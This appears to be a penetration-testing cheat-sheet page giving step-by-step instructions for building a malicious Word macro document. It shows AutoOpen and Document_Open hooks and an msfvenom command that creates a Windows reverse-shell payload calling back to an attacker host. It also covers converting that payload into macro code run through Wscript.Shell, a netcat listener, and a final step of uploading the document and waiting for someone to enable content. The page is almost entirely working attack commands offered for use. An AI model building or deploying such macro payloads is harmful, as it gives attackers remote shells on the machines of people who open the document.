Macro

Preparation

  • Install Office.

  • Create a Word document, called Evil.doc.

  • Open a Macros from View menu. Select 'Evil' document in Macros in:

  • Insert your macro name, 'MyMacro' in the Macro name: and then click 'Create'

  • This will take you to a VB editor.

  • Add the following script to your new macro. 

    Sub AutoOpen() 
  MyMacro 
End Sub 
Sub Document_Open() 
  MyMacro 
End Sub

  • Create a reverse shell payload with hta extension via msfvenom

# Kali
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.128 LPORT=1234 -f hta-psh -o evil.hta

  • Make them readable with a python script. Download hta2macro.py. 

# Kali
python hta2macro.py evil.hta

  • Copy the split string to the Macro and add some commands in the Macro. 

# Office Macro Editor
Dim Str As String

<Your string here>

CreateObject("Wscript.Shell").Run Str

End Sub

  • and save it as Word 97 format.

  • When you check the macro again, you see the following scripts.

  • Set up a netcat listener to validate your macro to work. 

# Kali
nc -nlvp 1234

  • Open the word document.

  • Click Enable Content.

  • Kali machine, you will see the connection.

Execution

  • Check your macro 

# Kali
sudo pip install -U oletools
olevba evil.doc

# Check if your macro exists

  • Set up a netcat listener again, upload the document to your target location, and wait until someone opens the document and enable content.

PreviousWindowsNextMS17-010

Last updated